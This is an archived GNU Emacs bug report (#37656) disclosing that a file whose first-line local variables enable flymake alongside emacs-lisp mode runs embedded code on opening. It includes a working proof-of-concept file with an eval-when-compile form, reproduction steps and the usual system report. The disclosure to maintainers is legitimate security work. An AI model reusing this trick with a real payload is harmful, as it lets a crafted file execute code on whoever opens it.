bug#37656: 27.0.50; Opening file with specially crafted local variables

bug-gnu-emacs

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

bug#37656: 27.0.50; Opening file with specially crafted local variables

From:	adam plaice
Subject:	bug#37656: 27.0.50; Opening file with specially crafted local variables can cause arbitrary code execution Inbox x
Date:	Tue, 8 Oct 2019 10:48:32 +0200

* To reproduce:

1. Create a file, say `~/foobar', (it could have an arbitrary
extension) with the following contents:

-*- mode: emacs-lisp; mode: flymake -*-

(eval-when-compile
  (with-temp-file "~/emacs_flymake_security_bug"
      (insert "Could have also executed any code.")))

2. Open the file with emacs:

emacs -Q ~/foobar

3. Inspect ~/emacs_flymake_security_bug:

cat ~/emacs_flymake_security_bug

* Expected result

~/emacs_flymake_security_bug does not exist.

* Actual result

~/emacs_flymake_security_bug does exist.

* Further information

This relies on the "deprecated" feature of allowing `mode: ' to be
repeated more than once, to also specify minor modes.  Just having:

-*- mode: flymake -*-

in, say, `~/foobar.el' would not trigger the security bug.  There may,
however, be alternative ways of triggering it, that I haven't come up
with.


This was "inspired" by a very similar bug (concerning an external
package, editorconfig), described here:

https://illikainen.dev/blog/2019-10-06-editorconfig

Thank you and best regards,
Adam


In GNU Emacs 27.0.50 (build 1, x86_64-pc-linux-gnu, GTK+ Version 3.18.9)
 of 2019-10-07 built on adam
Repository revision: 9839466b231b6384055b9b137405730876413cbe
Repository branch: master
Windowing system distributor 'The X.Org Foundation', version 11.0.11804000
System Description: Ubuntu 16.04.6 LTS

Recent messages:
For information about GNU Emacs and the GNU system, type C-h C-a.

Configured using:
 'configure --with-modules --without-pop'

Configured features:
XPM JPEG TIFF GIF PNG RSVG SOUND GPM DBUS GSETTINGS GLIB NOTIFY INOTIFY
ACL LIBSELINUX GNUTLS LIBXML2 FREETYPE HARFBUZZ M17N_FLT LIBOTF XFT ZLIB
TOOLKIT_SCROLL_BARS GTK3 X11 XDBE XIM MODULES THREADS PDUMPER LCMS2 GMP

Important settings:
  value of $LANG: en_GB.UTF-8
  locale-coding-system: utf-8-unix

Major mode: Lisp Interaction

Minor modes in effect:
  tooltip-mode: t
  global-eldoc-mode: t
  eldoc-mode: t
  electric-indent-mode: t
  mouse-wheel-mode: t
  tool-bar-mode: t
  menu-bar-mode: t
  file-name-shadow-mode: t
  global-font-lock-mode: t
  font-lock-mode: t
  blink-cursor-mode: t
  auto-composition-mode: t
  auto-encryption-mode: t
  auto-compression-mode: t
  line-number-mode: t
  transient-mark-mode: t

Load-path shadows:
None found.

Features:
(shadow sort mail-extr emacsbug message rmc puny dired dired-loaddefs
format-spec rfc822 mml easymenu mml-sec password-cache epa derived epg
epg-config gnus-util rmail rmail-loaddefs text-property-search time-date
subr-x seq byte-opt gv bytecomp byte-compile cconv mm-decode mm-bodies
mm-encode mail-parse rfc2231 mailabbrev gmm-utils mailheader cl-loaddefs
cl-lib sendmail rfc2047 rfc2045 ietf-drums mm-util mail-prsvr mail-utils
tooltip eldoc electric uniquify ediff-hook vc-hooks lisp-float-type
mwheel term/x-win x-win term/common-win x-dnd tool-bar dnd fontset image
regexp-opt fringe tabulated-list replace newcomment text-mode elisp-mode
lisp-mode prog-mode register page tab-bar menu-bar rfn-eshadow isearch
timer select scroll-bar mouse jit-lock font-lock syntax facemenu
font-core term/tty-colors frame cl-generic cham georgian utf-8-lang
misc-lang vietnamese tibetan thai tai-viet lao korean japanese eucjp-ms
cp51932 hebrew greek romanian slovak czech european ethiopic indian
cyrillic chinese composite charscript charprop case-table epa-hook
jka-cmpr-hook help simple abbrev obarray minibuffer cl-preloaded nadvice
loaddefs button faces cus-face macroexp files text-properties overlay
sha1 md5 base64 format env code-pages mule custom widget
hashtable-print-readable backquote threads dbusbind inotify lcms2
dynamic-setting system-font-setting font-render-setting move-toolbar gtk
x-toolkit x multi-tty make-network-process emacs)

Memory information:
((conses 16 44045 5448)
 (symbols 48 5971 1)
 (strings 32 15685 1582)
 (string-bytes 1 506409)
 (vectors 16 9198)
 (vector-slots 8 123144 8510)
 (floats 8 19 25)
 (intervals 56 186 0)
 (buffers 1000 11)
 (heap 1024 12431 1138))

[Prev in Thread]

Current Thread

[Next in Thread]

bug#37656: 27.0.50; Opening file with specially crafted local variables can cause arbitrary code execution Inbox x, adam plaice <=
- bug#37656: 27.0.50; Arbitrary code execution with special `mode:', adam plaice, 2019/10/15
  - bug#37656: 27.0.50; Arbitrary code execution with special `mode:', Stefan Kangas, 2019/10/15
    - bug#37656: 27.0.50; Arbitrary code execution with special `mode:', Stefan Kangas, 2019/10/15
    - bug#37656: 27.0.50; Arbitrary code execution with special `mode:', Stefan Kangas, 2019/10/15
    - bug#37656: 27.0.50; Arbitrary code execution with special `mode:', Eli Zaretskii, 2019/10/16
    - bug#37656: 27.0.50; Arbitrary code execution with special `mode:', Adam Plaice, 2019/10/16
    - bug#37656: 27.0.50; Arbitrary code execution with special `mode:', Eli Zaretskii, 2019/10/16
    - bug#37656: 27.0.50; Arbitrary code execution with special `mode:', Phil Sainty, 2019/10/16
    - bug#37656: 27.0.50; Arbitrary code execution with special `mode:', Eli Zaretskii, 2019/10/16
    - bug#37656: 27.0.50; Arbitrary code execution with special `mode:', Adam Plaice, 2019/10/16

Prev by Date: bug#37514: PATCH: Add setting to allow switching to an already-visible buffer by default
Next by Date: bug#37641: major/minor tick faces bleed into empty lines at the end of buffer
Previous by thread: bug#37321: 27.0.50; Excessive gc in a use case (el-search)
Next by thread: bug#37656: 27.0.50; Arbitrary code execution with special `mode:'
Index(es):
- Date
- Thread